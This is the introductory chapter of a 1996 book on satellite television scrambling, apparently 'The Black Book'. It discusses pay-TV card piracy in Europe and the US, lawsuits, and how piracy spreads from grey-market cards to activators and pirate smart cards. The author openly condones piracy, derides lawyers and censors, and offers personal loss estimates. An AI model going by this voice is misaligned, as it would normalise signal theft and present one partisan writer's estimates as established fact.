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1: An Introduction To Scrambling 





The first law of magic is that chaos is order and order is chaos. This 
is a proven mathematical fact. It is also the first law of hacking. In 
order for the scrambled signal to be recovered, there has to be some 
sort of order in the scrambled signal. The more secure systems use 
digital techniques but despite their complexity, they are not 
ultimately secure. 


The fun or thrill of hacking is breaking a system that cost millions to 
develop with a few pence worth of components. It is a common 
fallacy that if the subscription cost of a system was reasonable 
hackers would not attempt to hack that system. This argument is 
generally proposed by JAFAs. for those still wondering what JAFA 
means, it is an acronym for Just Another F*%&ing Amateur. 


Hacking is a game of technological chess and as with any sport 
nowadays there are amateurs and professionals. Luckily for the 
hackers the greater proportion of the system users are non-technical 
business people and hence by the above definition, amateurs. 


The information in the book should be equally valuable to system 
owners and to hackers. The system owner has the most to lose and 
the hacker has the most to gain. It will give the system owner access 
to information about hacking that he or she would not otherwise be 
able to obtain. It should also give the reader, regardless of side, a 
detailed knowledge of the practice of signal security. 


That was written in 1988. This is 1996. The market for satellite television 
piracy in Europe is huge. It is a truly multinational effort as the legal 
framework is just not able to cope with this form of activity. While it is often 
illegal to pirate a channel in the country from which it is originated, any 
foreign channel is fair game. The channels who are the victims often neither 
have the will or the legal grounds to act against this piracy. When channels 
do take legal action outside their home market, once the laughing dies 
down, the realisation of abject failure dawns upon them. The handling of the 
problem lies not in the lawyer's remit, but rather in the hands of those who 
select the system. 


It is estimated that the Blackbox industry in Europe is worth at least £500 
million per year in trade. Minor constraints such as national borders do not 
affect this industry. So for a situation like BSkyB, who only have the rights 
for Ireland and the UK, the pirates can market the service Europe wide. 
Channels like FilmNet, Rendezvous, Canal Plus and TV1000 have a 
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translingual appeal - hardcore pornography. Therefore they are pirated in 
every market. 


Of course there are some, primarily working for the afflicted channels, who 
would question the figure of £500 Million. The simplest way would be to take 
as an example the piracy on the BSkyB 09 card. The first fully operational 
pirate 09 smart card appeared in October 1994. BSkyB switched to the 10 
card (0A to hackers) on 31/10/95. Therefore there was approximately a year 
of complete piracy on the 09 card. 


The main targets on the 09 card were the Sky channels. This resulted in a 
subscription to the value of £287 being lost by BSkyB. Also on the same 
pirate card were, The Adult Channel (a UK soft porn channel) and Eurotica 
(the hard core version of the Adult Channel). This pushed the value of the 
lost subscriptions to approximately £387. 


Considering there were at least 500,000 pirate devices in the UK and 
Ireland at the height of the 09 piracy, this would give a piracy value of 
£193,500,000 for that year. Of course you are not going to find the channels 
declaring such a loss to piracy. It would not be good for their business. 
Naturally since these figures can never be properly assessed, it is difficult to 
get any reliable answer. The problem is that the media analysts who review 
the stocks generally haven't a clue about piracy. The fact that only a limited 
amount of the stock is in play at any given time produces an artificial view of 
the situation. 


At the time of writing, late July 1996, the Sky 10 card has been hacked and 
pirate devices are once more flooding into the market. This time, the hack is 
limited to Battery Cards and it has not been released in PIC16C84 based 
cards. The Battery Cards use the Dallas 5002FP which has proven to be 
more robust than the majority of the secure chips on the market. 


Of course it should be remembered that BSkyB ran their first public Pay Per 
View event on March 17th, 1996. Even this was hacked as someone found 
a backdoor into the card that allowed the PPV event to be enabled on 
legitimate BSkyB cards. While this was separate from the actual Battery 
Card hack, it does bode ill for any future PPV event that BSkyB want to run 
using the 10 card. A future PPV event would be compromised by both an 
activator hack and by the Battery Card hack. 


The advertising of pirate devices in Europe has changed little over the last 
two years. If you pick up some European satellite television magazines and 
you are likely to run across adverts for pirate smart cards or decoders 
before you get to any articles. Magazines published in the UK such as 
“Satellite TV Europe” and “What Satellite” even carried advertisements for 
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pirate BSkyB cards. It could be argued that these magazines exploited the 
pirate card market for the last few years. Indeed the current European 
Commission green paper on the protection of encrypted services referred to 
this exploitation of the piracy industry. Specifically the green paper mentions 
that these magazines should not be hit for providing an advertising medium 
for pirate devices. 


In September 1995, “What Satellite” apparently got moral qualms about 
advertising BSkyB capable pirate cards. Well it is either that or BSkyB's 
legal people convinced them of the error of their ways. Well for a magazines 
that depends on BSkyB's television schedules, they had а lot to lose by not 
taking any notice. 


“What Satellite” issued a letter to their pirate card advertisers stating that 
they would not advertise pirate BSkyB cards anymore and all new card 
adverts would have to specify which channels were decoded. This of course 
was very convenient timing as the switch to the Sky 10 card happened on 
31/10/95. 


Over the lifetimes of the 07 and 09 hacks on BSkyB, the level of piracy was 
such that the legitimate channels were not able to prosecute all of the 
pirates even when the legislation is on their side. Sharon Southwell-Gray, 
the Deputy head of legal and business affairs for BSkyB even admitted that 
such a situation existed with the 07 piracy in an affidavit given to the UK 
High Court in a case against a distributor of blockers. This revelation was a 
surprising glint of reality based lucidity falling as it did on an industry jaded 
by content-free press releases. 


Perhaps the reason that the Blackbox Industry thrives is stupidity. The 
stupidity lies mainly in the policies of the management of the channels under 
attack. 


Of course it is a sweeping generalisation to say that all channels are 
similarly afflicted. Some channels take the matter of piracy seriously and 
have plans to deal with the eventualities. Perhaps "eventualities" is the 
wrong word. It doesn't convey the uncertainty of imminent doom. 


In the last few years, most channels have been trying to fight piracy with 
varying effects. Some have handled the whole issue with such cack- 
handedness that it amazed nobody, except the channels, when the cases 
against the pirates collapsed. 


Admittedly each scrambled channel is in an almost indefensible position. 
They cannot employ military grade security and algorithms in their scram- 
bling systems - the military will not let them. The legislation extant in the 
areas where they are most pirated does not offer them protection. Their 


1-3 


1: An Introduction To Scrambling 


systems are based on architectures that are often five or more years out of 
date and the technology has advanced sufficiently to allow hacks on the 
aspects that were virtually unhackable five years ago. 


Therefore it would be logical to design any future system so that it can 
recover from a hack. It is more important that a system can recover from a 
hack. Trying to make a system hackerproof or indeed pirateproof is a futile 
exercise. 


As can be seen from the recent events in the Blackbox industry, the 
progress of electronics has a devastating effect on the security of systems. 
The SECAM version of the Nagra Syster scrambling system has been 
hacked with a hack based on an attack on the video scrambling technique. 
This attack, while known about for at least five years, was until recently 
economically and technically not viable. 


The operational lifetime, or more precisely, the hack free period of a system 
is now less than five years. It varies with the amount of hackers going after 
the system. Thus for a sporadically used system, there may be very little 
risk of the system being hacked. Of course for a widely used system, a hack 
is inevitable. 


There are some people who would prefer that the Black Book did not exist. 
In fact at one conference on piracy prevention a speaker asked how they 
could stop the Black Book from being published since certain sections 
appeared to be against UK law. The smart retort would have been to tell 
them to make more secure systems but the reality cuts deeper. Well, that 
and the fact that this book is not published in the UK. 


A scrambling system is like a very high stakes poker game. If the channel is 
bluffing about its scrambling system then it will loose millions. Most of the 
systems that are coming on to the market are actually fairly secure. It is the 
small design flaws that allow them to be hacked. 


The Black Book has become the “bible” of scrambling systems. It seems 
that the book is often consulted to find the characteristics of a scrambling 
system by both channel executives and hackers. Apparently the manufac- 
turers of the systems rarely supply interesting data sheets other than vague 
patents and then you have to look for the patents. 


Some manufacturers adopt the “Mushroom Strategy” with users of their 
scrambling systems. They keep the users in the dark and feed them on the 
stuff that mushrooms are fed on. Some of these manufacturers would have 
a stunning second future in agriculture ahead of them. 
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This strategy is more politely referred to as “Security By Obscurity”. In all 
cases where this approach is used, the system is hacked. The designers 
frequently believe that they are cleverer than the hackers and therefore the 
hackers could not break their system. There is no sight as pathetic as the 
designer who is blinded by his own brilliance. There is nothing funnier than 
someone who is not in possession of all the facts trying to defend this 
strategy. Sometimes you have got to wonder if the Mushroom Strategy is an 
alternative name for Catch-22. 


The Mushroom Strategy also has more dangerous implications when the 
system is hacked. By its very nature, it is impossible to brief the 
counter-piracy team assigned to limit the damage. It seems the next big 
operation to use the Mushroom Strategy will be the Digital Video Broadcast- 
ing project. 


The DVB project is meant to provide some form of common platform for 
digital television broadcasting in Europe. The system will use a Common 
Scrambling Algorithm for the base level encryption. Each vendor can then 
add his access control architecture. The Common Scrambling Algorithm will 
not be disclosed but will be given to each member of the DVB project by a 
custodian after non-disclosure agreements have been signed. Yeah, right! | 
am not sure what genius came up with this idea. The DVB actually has a 
plethora of committees of all sorts of experts except one on how to make 
the coffee. The words “Tower Of Babel” spring to mind. They even have a 
committee of experts on piracy. The only thing, it seems, that these experts 
are expert on is developing systems that keep getting hacked! 


The question now relates to whether the DVB systems will be hacked. 
Perhaps it is only a matter of time, but the lessons of the past may have 
been learned and integrated into the DVB specifications. But even if the 
security on the DVB is not as good as it could be, there may be some 
Europe-wide laws to protect this colossal folly. 


The implementation of pay television legislation in Europe has been nothing 
short of a complete disaster for the channels. To put it bluntly, if a service is 
hacked - it is has no viable protection under the law. Lawyers cannot repair 
a breach of security but most of those in the satellite television business 
seem to believe that they can stop the pirates exploiting that breach. 


In Europe there is no coherent Europe-wide legal framework for dealing with 
piracy - yet. It is generally a case of each country protecting its own 
channels or channels that uplink from their country. 


There is legislation afoot to change the face of piracy in Europe. The 
European Commission published a green paper in March that seeks to deal 
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with the legal protection of encrypted services in the EU. Of course it seems 
that the same crowd responsible for the fiascoes of the past have been let 
loose again to wreak havoc with more bungled legislation. Not exactly the 
Dogs Of War, more like the shi-tzus of waffle! 


This new European legislation, should it follow the format outlined in the 
European Commission green paper, will make piracy of encrypted services 
illegal throughout the European Community. It seems that the channels 
seem to consider that legislation will, in itself, be enough to stop piracy. 
However this is due more to a faulty understanding of what legislation is 
meant to achieve than anything else. Legislation does not exist to stop 
crime. Specifically, anti-piracy legislation does not exist to stop piracy. It 
exists to provide remedies for the victims. 


The problem for those who would enact such legislation is the incompe- 
tence and inabilities of the channels. It is the channels that have a duty to 
protect their service. Normally this is effected by using encryption and 
scrambling. Any government, when approached by a channel, will want to 
see proof that the channel is protecting the signal. It is not in the 
government's interest to waste taxpayers’ money protecting the channel 
against piracy when the system was hacked because of the channel's 
incompetence, ignorance and ineffectiveness. 


If a channel wishes to have the protection of legislation, then it should go 
some of the way towards actually using a scrambling system that is not 
easily hacked. Some form of independent certification of scrambling 
systems to be used in Europe would therefore be a good thing. The current 
trend of relying on non-disclosure, otherwise known as security by obscurity, 
is not viable and plainly allows the implementation of rather mediocre 
scrambling systems. It is not just a question of the law protecting the 
channels. It is a question of why the law should be used to protect a 
company that cannot be bothered to protect itself. 


In the European Commission's green paper, there are references to the 
anti-piracy recommendations from the Digital Video Broadcast project. 
What worries me is that some of the phrasing in the legislation proposed in 
the DVB recommendations is, in some respects, particularly clueless and 
plainly ignorant of reality. 


These people refer to the criminalisation of the possession of pirate digital 
decoders. The problem is that most of the major piracy in Europe for the last 
few years has been based on pirate smart cards. Of course when one of the 
proponents of the Council of Europe legislation was questioned on this, he 
was pointed out that the phrase "pirate decoders" also refers to pirate smart 


1-6 


1: An Introduction To Scrambling 


cards. The image of the “Blessed Are The Cheesemakers” scene from 
Monty Python’s “The Life Of Brian” sprung to mind. 


At the time of writing, the European legislation has still to be resolved. It is 
difficult to be optimistic about the situation given the past performances. It 
seems what the lawyers and bureaucrats would like is a legal framework not 
unlike the US model. Of course here in Europe, the US model would not be 
effective without a police state apparatus. No doubt some of the people 
advising the European Commission and the Council Of Europe would wish 
for such a situation. 


Even in America, land of the brave and home of the fee, magazines carry 
adverts for the monthly codes for VideoCipher and B-MAC. Now with the 
collapse of the DSS smart card security, they carry adverts for pirate DSS 
smart cards marketed from outside the USA. With the US legal system, 
you've got to be insanely brave or stupid to be in the US Blackbox industry. 
Most DSS pirates are operating outside of US jurisdiction. 


It is interesting to speculate on the future of piracy in Europe. With the 
imminent legislation, it will probably be illegal throughout the European 
Community to sell, manufacture, import or use pirate devices. But will that 
stop piracy? The answer has got to be a resounding no. The USA has some 
of the toughest anti-piracy legislation in the world and it also has one of the 
biggest piracy problems. 


So Why Does Piracy Happen? 


1. Channel Not Legitimately Obtainable 


Though the channel can be received in a geographical area, the politics and 
legalities of the situation may prevent people from subscribing. The main 
problem is copyright. 


The programme producers can make more money out of selling the same 
product to a large number of small copyright areas than to one large 
copyright area. This becomes more apparent when the copyright areas are 
multilingual. Each linguistic territory generally has its own broadcast 
services. For example, BSkyB covers the primary English language market 
and Premiere covers the primary German language market. 


With analogue systems, for a service to feed more than one linguistic 
market would require either additional audio subcarriers or teletext subti- 
tling. A more costly alternative is a separate service for each area. 
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With the emerging digital services, extra audio channels are less of a 
problem. All that is left is the legal problem. As the channel contracts with 
the programme provider to only sell in the designated area, the channel is 
not meant to sell outside of that area. The programme provider will probably 
have a contract with another channel for that area. Therefore any potential 
subscriber outside of the channel's designated copyright area cannot legally 
subscribe to the channel. 


Above all, the copyright issue is the one issue that creates the necessary 
conditions for piracy. It is logical to say that most of the market for pirate 
cards and decoders would disappear if there was a unified copyright area in 
Europe. This is sometimes referred to as a footprint based copyright area 
as opposed to a linguistic or national copyright area. Whether the piracy is in 
the Grey Market form or Black Market depends on the legal framework and 
whether the demand can be supplied by Grey Market piracy. 


2. Programming Not Available 


If someone is told that they cannot have something, they then want it. It is a 
flaw of Human nature and television is one of the most powerfully addictive 
drugs known to Mankind. 


The best example of this is the hard core pornography situation in the UK. It 
is not possible, in the UK, to subscribe to a UK hard core pornography 
channel for the simple reason that there are none. 


A hard core pornography channel would not be granted a licence from the 
UK's regulatory commission. This is not surprising as most seem to 
consider that those who make up this commission are totally unrepresenta- 
tive of the people in the UK and some even consider them to be completely 
clueless. As a direct result, the channels carrying hardcore pornography 
such as FilmNet, TV1000, Canal Plus and Rendevous have an avid 
viewership in the UK. The quasi-legitimate Grey Market cards are very 
much in the minority as the scrambling system used on these channels are 
compromised. 


3. Programming Too Expensive 


Would you pay for a movie channel that shows mainly back-catalogue 
movies with the odd recent release? The odd recent release is of course a 
movie that you saw on video three or four months earlier. If you answered 
"no" then you probably do not subscribe to any of the movie channels. 


The sad fact is that many of the movie channels available only run movies 
three or four months after they are released on video tape. The movie 
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channels pad the running list by loading it with back-catalogue movies and 
showing the main movie at two or three times each day. Under closer 
examination, the movie channel's claim of replacing the video rental store 
falls apart. When the viewer has seen the vast majority of movies on video 
or indeed on terrestrial television already, the subscription fee begins to look 
expensive. 


At the time of writing, a typical weekday running list consists of movies from 
1947, 1956, 1994, 1986, 1980, 1984, 1994, 1994, 1993, 1994, 1994, 1993, 
1994. This is being written in May 1996. The oldest movie being shown on 
Sky Movies is nearly fifty years old and the most recent is two years old. 


Marketing people love to quantify and classify people. The target market for 
the movie channels is that comprised of the the people with a lot of 
disposable income, the АВС15 as they call them. Unfortunately for the 
movie channels, the АВС15 are too busy making and spending their money 
to subscribe. As a result, the movie channels have to target people with less 
disposable income. 


The harsh reality is that the ideal movie channel viewer is someone with a 
lot of time on his or her hands. The only people who would fit that 
description are retired, rich or unemployed. They all get the movies on a 
more timely basis from the video rental shop. 


The Three Phases Of Piracy 


In most situations, piracy on a channel moves through three distinct phases. 
In some respects, these follow the growth of hacking knowledge about the 
system. 


1. Card Scams And Grey Market Operations 


The first stage of piracy on a channel consists of card scams and Grey 
Market operations. While at this time there is no viable pirate device on the 
market, there is still a large demand. The obvious method of fulfilling this 
demand is to redistribute the subscriptions. This other term for this 
redistribution is a Grey Market operation. 


The trend towards smart card based systems has made Grey Market piracy 
easier. Whereas with an Embedded Secure Microcontroller based system 
there is a decoder to be shipped, a smart card based system only requires a 
smart card to be shipped. This is because it is often easier to acquire a 
decoder even outside the copyright area. The classic example of this is the 
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D2-MAC EuroCrypt system where decoders are available Europe-wide 
even in areas where there are no D2-MAC channels in operation. 


A subscription is taken out in the legitimate copyright area and then the 
decoder or smart card is shipped to the person really paying for the 
subscription. The end user is outside the copyright area and cannot 
legitimately subscribe. The Grey Market is where both the channel and the 
user benefit. The channel gets a subscription that looks legitimate and the 
user gets access to the programming. It is only the lawyers wno whinge at 
this arrangement. 


There is a darker side to this. Often, in a move to bring in subscribers a 
channel will engage in Quickstart marketing. This scheme makes it possible 
for someone to walk into a shop, sign a subscription form and walk out with 
a card. The card is activated shortly afterwards. However when BSkyB ran 
such an operation, there were a lot of cards obtained by this method with 
false details and addresses. Some of these addresses showed real 
imagination - railway stations were popular. Most of these cards ended up in 
Europe. 


It is estimated by pirate sources monitoring Sky's over the air traffic that 
some one million Quickstart cards over the lifetime of the 09 had been 
acquired in this manner. However in this phase the Quickstarts only last for 
a few weeks at best. The real damage caused by the Quickstart marketing 
programs does not become apparent until the second phase. 


2. Activators And Blockers 


As the knowledge about a system increases, one of the first things that 
hackers learn is how to activate smart cards. From there it is a short step to 
learning how to block the kill signals. 


The term for this operation is a Phoenix operation. Named after the mythical 
bird that renews itself, it is perhaps the more damaging than an outright 
pirate device. It marks the point where the pirates take over the channel's 
access control system. 


Some limited options will be available to the channels. They may be able to 
reduce the number of pirated official cards in circulation by drop-dead 
ECMs. However, at this stage, the demise of the card is imminent. 


3. Viable Pirate Devices 


In this phase, the card is hacked and the pirate smart cards filter into the 
market. The rate at which they appear is slow at first but quickly turns into a 
flood. This again is related to the nature of the Blackbox industry. The 


1-10 


1: An Introduction To Scrambling 


information and data required to produce the pirate card is sold on down the 
line. 


When the pirate cards appear, the first reaction of the channel is to 
implement ECMs. For example, in the last few months of the Sky 09 card, 
ECMs were occurring every few weeks. The effect on the pirate cards was 
minimal. 


The only thing that will solve the problem at this stage is an issue of new 
smart cards. It is faulty logic that ECMs will stop the piracy. The information 
required to produce a viable pirate card includes an operational knowledge 
of the official model. Therefore the hackers and pirates would be able to 
figure out the ECM within a very short time. This coupled with the updatable 
nature of the pirate cards on the market makes an ECM an extremely 
temporary matter for the pirates. 


The Channels Strike Back 


The hacker scene is currently reeling after a series of raids and court cases 
over the planet. In North America, News Datacom and DirecTv have filed a 
civil suit against 22 named defendants alleging that these people were part 
of a conspiracy to hack the DirecTv access control card and distribute the 
hacked versions. The suit is aimed at people in four jurisdictions; USA, 
Canada, Grand Cayman and Bermuda. This casting of a wide jurisdictional 
net may bring problems. 


It is not yet known how much legality a US court action has against people 
living and operating in another jurisdiction. However some sources have 
said that the US proceedings may be transferred to Canada as part of the 
NAFTA trade agreement. The hackers and pirates situated in the islands 
may be somewhat safer unless they go to the USA. If they do go to the USA 
they would be classified as “fugitives from justice” and would be liable to 
arrest. 


The fact that News Datacom and DirecTv had to resort to primarily civil law 
shows just how uncertain the whole legal situation surrounding DirecTv is. 
The law suit alleges that the named defendants were in violation of the 
RICO (Racketeering Influenced and Corrupt Organization) statues, the 
Lanham Trademark Act. The RICO statutes are more typically used against 
organised crime and drugs traffickers. The trademark legislation is also 
more typically used against people manufacturing counterfeit devices and 
passing them off as the real thing. The pirate cards however have not 
apparently been passed off as the real thing but there is a deeper worry 
here for DirecTv and News Datacom. 
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The latest attack on the DirecTv system is the Phoenix program. Normally 
the Phoenix is the first hack on a smart card based system and is a 
precursor to a general collapse of security. However the DirecTv situation is 
different to the European one. The DirecTv hack is still in its first generation 
and the main profits were to be made from pirate battery cards. This is the 
path that the hack has followed. Now with the Battery cards becoming 
commonplace, the Phoenix hack seems to be the next major attack. 


DirecTv have, in a press statement issued covering the court action, stated 
that they will be changing their smartcards over to the new issue beginning 
in August. This ties in nicely with an October switchover though given the 
geographical and logistical expanse that is the United States, the actual 
switchover may be delayed until November or December. It is beginning to 
look as if News Datacom and DirecTv are engaging in that tactic that we are 
familiar with here in Europe - counter-piracy by press release. 


In Europe, there have been some raids of varying success and of similar 
effect. The main European pirate company Benedex was raided by France 
Telecom and Canal Plus on the basis that the company was behind the 
D2-MAC EuroCrypt piracy. While the company was a major player, it soon 
turned out that it was not exactly responsible for the piracy. TV1000 and 
FilmNet upgraded their keys in an attempt to hit the pirates. The upgrade 
has become known as the “Natural Born Idiots” upgrade. FilmNet and 
TV1000 were about to show the Natural Born Killers movie and had decided 
to hit the pirate viewers in Ireland and the UK by changing keys. The movie 
is banned in Ireland courtesy of the somewhat stupid and anachronistic film 
censors. As a writer, | would like to regard censors and critics in the same 
light, preferably that of a laser targeting ‘scope. In the UK, the movie has not 
been given a video release yet. The new keys were available within hours 
proving that the move by FilmNet and TV1000 was exactly that of a bunch 
of idiots - the only thing that they succeeded in doing was swelling the bank 
accounts of the pirate card manufacturers. 


Sky, News Datacom, and apparently their security consultancy Network 
Security, were busy as well. This time they were operating way out of their 
jurisdiction in Germany. They had tried to set up some German hackers and 
pirates. In an effort to entrap them they tried to purchase the software for 
activating the Sky 10 cards. Then the hackers got raided by the German 
police the next day. Of course the German prosecutor was, allegedly, less 
than happy when he found out that Sky had no right to collect subscriptions 
in Germany. 


Sky have been busy elsewhere as well. In Ireland, it seems that they have 
taken the Megatek operation out of the game. They got an Irish High Court 
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judge to grant an order against Megatek preventing them from trading and 
also a Mareva order preventing Megatek from reducing its assets in the 
jurisdiction below £200000. In the UK, the Federation Against Copyright 
Theft, FACT, moved against Chris Cary’s operation. The warrant was 
executed by the police and apparently News Datacom people were in 
attendance. The move was, however, questionable. Further enquiries made 
by a journalist to the FACT received some strange responses. FACT, it 
transpired were almost clueless on the issue of satellite television piracy 
and were generally more inclined to be pursuing video tape piracy. The 
move to satellite television piracy was a strange one. However if you 
examine the terms under which an Anton Piller order is granted in the UK, 
things begin to make sense. One of the things that an Anton Piller order 
cannot be used for is a search of premises to see what charges can be laid 
against the defendant in the future. In other words it cannot be used as 
permission for a fishing expedition. The legal reference is [Lawton L.J; 
Hytrac Conveyors Ltd Vs Conveyors International Ltd. 1983. F.S.R 63, page 
70.) 


This matter has yet to be settled. Тһе Megatek situation also has to be 
resolved. In terms of piracy on VideoCrypt, the main players it seemed were 
Benedex and Megatek. With these companies out of the scene, Sky and 
News Datacom could claim that they have achieved a measure of success 
against Sky 10 pirate cards. However the best is, perhaps, yet to come. It 
could force matters into a situation where the information to build a pirate 
Sky 10 card is dumped on to the open market. It has not visibly stopped the 
supply of pirate 10 cards and now Phoenixed 10 cards are beginning to 
appear. 


Sky and News Datacom were too stupid to realise that the situation 
regarding piracy was actually under control. There was no SEASON hack 
on Sky 10. There was no PIC16C84 hack on Sky 10. There was only the 
Battery card hack and that was in the region of £200. As such it was too 
expensive for most of the would-be pirate viewers in the UK. It was 
effectively catering for viewers outside the copyright area. Of course it was 
all relatively high profile. 


Had these people any understating of counter-piracy, they would have 
realised that having an acceptable low level of piracy is preferable to a 
situation where there is widescale piracy. It is like the thought processes of 
those involved operate in black and white - a thing is either right or wrong. 
The real world is a series of compromises. Rather than the clarity of black 
and white things exist in levels of grey. 
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Perhaps it is a case of sheer desperation on the part of News Datacom and 
Sky. They have resorted to the use of civil law as opposed to criminal law to 
attack people. Their move against the DSS hackers and pirates mirrors the 
moves they have made in the UK and Ireland. Will they be successful? It is 
too early to tell. They have made some inroads against the distribution of 
the pirate devices in North America and Europe. But the problem of piracy 
on the services still remains. If anything they have moved the pirate industry 
a step closer to the next generation of SEASON hacks. If this type of hack 
appears then it is going to cripple any service that is attacked. It seems that 
like sharks with the scent of blood from a wounded prey, hackers and 
pirates will be going after News Datacom protected services first. 


Hacking: The Battle For Dominance 


Hacking seems to be a form of evolution where the technically proficient are 
trying to beginning to take over. The previously dominant group in modern 
society, the lawyers and politicians, have in general been slow to grasp the 
ramifications of technology. Hackers have not. Indeed it could be argued 
that hackers are the biological embodiment of the process of evolution. 
Some of the lawyers and politicians on the other hand are living fossils. 
Their evolution moves at the same pace as light trying to escape from a 
black hole. The immediate response from the lawyers and the politicians is 
that they try to reign in the hackers with the tools and chains that they know 
best - legislation. 


Some legal philosopher once described America as a society of laws. This 
of course could be applied to any democracy where there is a constitution 
and bill of rights. But more importantly, the description is wrong. A society is 
essentially a set of people with some shared objectives. In that set of people 
there will always be some group scrabbling for dominance. 


For the last few hundred years, the group that had dominance over the 
society were the lawyers and politicians. They had, on the surface, the best 
interests of the society in mind when drafting the legislation and rules. The 
reality was that their real motives had degraded in the cold light of day to the 
perpetuation of their position and control of society. 


Such a hierarchy was effective in a pre-industrial and industrial society. 
These were societies where things like capital punishment were common. 
That perhaps is a key to the understanding of this hierarchy. The purpose of 
capital punishment is not to exact some retribution but to terrify. It was 
intended to terrify the other members of the society by showing them just 
how nasty and terrible the law can be. Fear, here, is the key. 
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When people started to lose their fear of lawyers and politicians, the society 
changed. The common images of the drink sodden senile judges, the slimy 
ambulance chasing lawyers, the pervert politicians demonstrate how far 
modern society has come. Some would argue that these images have 
always existed. 


The old saying that whom the gods would destroy the first make crazy could 
be upgraded for today. The new saying would be those who have to be 
destroyed are first made into figures of hate and distrust. It is of course 
made easier by the fact that the perception is that lawyers and politicians 
have become detached from society as a whole. They have become 
isolated. 


This lack of fear coupled with the move from an industrial society to an 
information society has amplified the problem for the politicians and 
lawyers. Their powerbase has been, and continues to be eroded. 


Of course some of these lawyers and politicians will not go quietly into this 
brave new interconnected world. The best example of the politician’s death 
rattle, in the United States, was the Communication Decency Act. It is the 
product of minds ignorant and incapable of the task. It is meant to impose a 
specific set of moral standards on the internet. The internet is far beyond 
their little minds and far beyond the confines of any one country. It is a 
construct of the mind and, in some respects a global image of the mind. 
However the people who came up with the CDA are lacking in one major 
respect - they cannot understand that which they are trying to legislate for. 
And you probably thought | was going to say that they lacked minds. 


The problem that the politicians and lawyers now face is a society where 
power is becoming redistributed. It is something that they are not used to 
and they do not seem to know how to react. The first stage of this change in 
the structure of society was the proliferation of the personal computer. The 
second stage was the internet. With the internet, there are no national 
boundaries and paper laws are frequently ignored. 


To a hacker, it is difficult to respect a politician or a lawyer. These people 
are paid to lie. Hacking, at the most basic is dealing with truth. An equation 
is either true or false; a bit is either one or zero. Such simplicity, however, 
rarely translates to the realm of the politicians and lawyers, or indeed to the 
real world. 


Perhaps the most terrifying thing in all of this is that the modern society, with 
the constitution and bill of rights is an illusion. It never really was a 
democracy. Democracy died a long time ago. It did not collapse howling іп а 
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sea of blood and flame. It died so slowly and silently that few noticed. It was 
strangled by rules, regulation and legislation. 


So what has wrecked this status quo? For the answer, we have to look at 
the history of printing. Prior to Gutenburg’s invention of movable print, books 
were rare. The Church had a virtual monopoly on the production of books 
and therefore by default, on the production and dissemination of informa- 
tion. As the Church must have known, when you control the flow of 
information, you control what people think. Gutenburg's movable typeface 
smashed that monopoly to such an extent that the Church never again 
re-established control. The personal computer is the modern equivalent of 
the invention of movable type. With the personal computer and the internet, 
man is no longer an island - he is a virtual media emperor. 


The hackers altered the balance of power a long time ago. While lawyers 
were wasting their time in law school, hackers were laying the foundations 
of the modern interconnected society. Above all, hackers were involved in 
establishing new ways of distributing and using information. 


One of the most vulnerable sections of society to a change in the way 
information is distributed and processed is, not surprisingly, the law. It is a 
system of rules based inference and carefully structured bureaucracy. The 
people in this structured bureaucracy have such wonderful rituals designed 
to enforce the whole concept of hierarchy. 


In an information based society, those who control the information have the 
power. The reason that law appears to be so complex is because it is simply 
made to appear that way. The rather arcane method of speech where 
lawyers use phraseology more at home in the seventeenth century is meant 
to impress with pompous verbosity. The particular strength of good lawyers 
is that they can take a case and know the relevant rules applicable and 
other cases where these rules were applied similarly. Now how much faster 
would a properly programmed computer derive the same information? 


Of course in any society, there is an even more vulnerable part of the 
dominant group - the financial sector. It is improbable that the triumvirate of 
politicians, lawyers and financiers could really exist without each other. All of 
these sections are vulnerable to the hacker but, more importantly, the 
damage that hackers can wreak in an information society is astounding. 


With the move towards electronic cash and electronic funds transfer, there 
are more opportunities for those who would subvert the system. And who 
knows better how to subvert a system than a hacker? Of course the quick 
retort would be the system designer. 
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A central element of the cashless society will be the smart card or electronic 
purse. There are, believe it or not, some people who still consider smart 
cards as being secure enough for this type of application. Now the same 
arguments were used to promote the use of smart cards on satellite 
television scrambling systems and where has it got these systems? This is 
the point at which things become grey, hidden in the twilight zone between 
satellite television piracy and real crime. Admittedly there are some who 
would find no difference between the two. 


The fact that smart cards are not secure means that a cash or funds 
transfer system that is based on smart cards is exceedingly vulnerable to 
hackers and commercial pirates. The expertise is there to hack the cards. 


Now of course it is only a matter of time before there is some hack on the 
newer generation of electronic cash cards. The stored token types as used 
for telephone call cards and other trivial applications are totally compro- 
mised at this time. (see Chapter 4) 


The types | am referring to are the Mondex type applications where each 
card can store a number of credits that are effectively cash and can be used 
as such. 


There is a big difference between the electronic version of cash and real 
cash. Real cash is a tangible element. Electronic cash is not so tangible but 
the smart card is. 


There are basically two types of electronic cash schemes; blind and 
auditable. In the blind scheme there is a finite amount of electronic cash 
credits in circulation regulated by the service provider. However the service 
provider can validate each transaction as being authentic without knowing 
the identities of the parties. 


The auditable scheme is more reliable in that the service provider can 
authenticate each transaction and will have an audit trail which can be used 
to identify the parties involved. 


All of the above depends on security. The algorithms and keys have to be 
secure. The smart card has to be secure. A house of cards is just too bad a 
pun for this edifice. 


Now if satellite television piracy and hacking is made so illegal that there is 
no clear differentiation between hacking and real crime, what is to stop a 
hacker from going for the electronic cash cards? If there is no real 
differentiation, what is to stop a hacker from selling his discoveries to 
organised crime interests? 
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Future Forms Of Piracy 


The architecture of the Blackbox industry is hierarchical. A few main 
companies at the top generally fund the research. The then either 
manufacture the pirate devices or sell the information on down the line. 
However this has changed over the last few years and the industry is 
becoming more diversified. 


The most recent innovation in the industry has been the Battery Card. This 
is a pirate smart card that is based on the Dallas 5002FP microcontroller. 
This chip has proven to be one of the more resilient chips on the market. 
Perhaps if channels paid more attention to what hackers and pirates use, 
they would be in a better position. 


The Battery Cards have a touch sensitive keypad. In the event of an ECM 
by a channel, the card’s manufacturer issues a set of numbers or letters 
which the card user then types into the card. After this the card works again. 
It cuts the effective lifetime of an ECM from a few days to a few hours. 


Of course this innovation was improved upon by a modem module. This 
module allowed the Battery Card user to connect his card to the phoneline 
and have it updated automatically. The effective lifetime of an ECM was 
further reduced as a result. 


The whole concept of having an updatable pirate device is not new. Indeed 
it has been in operation with VideoCipher II piracy in the USA for almost ten 
years now. The on-board modems were also largely an American innova- 
tion. But the main question facing the current services and prospective 
Digital Television services is the form of future piracy. 


There are two possible forms of piracy on existing services and Digital 
Television services. Both of them have already been tested experimentally 
with the existing scrambling systems and have been found to work. It is not 
so much a question of if these hacks will be implemented as when. 


Someone once said that the best way to predict the future is to invent it. 
While things | write about have a habit of coming true this is not to say that 
the hacks outlined below will. But | have the utmost confidence in the 
competence of committees. 


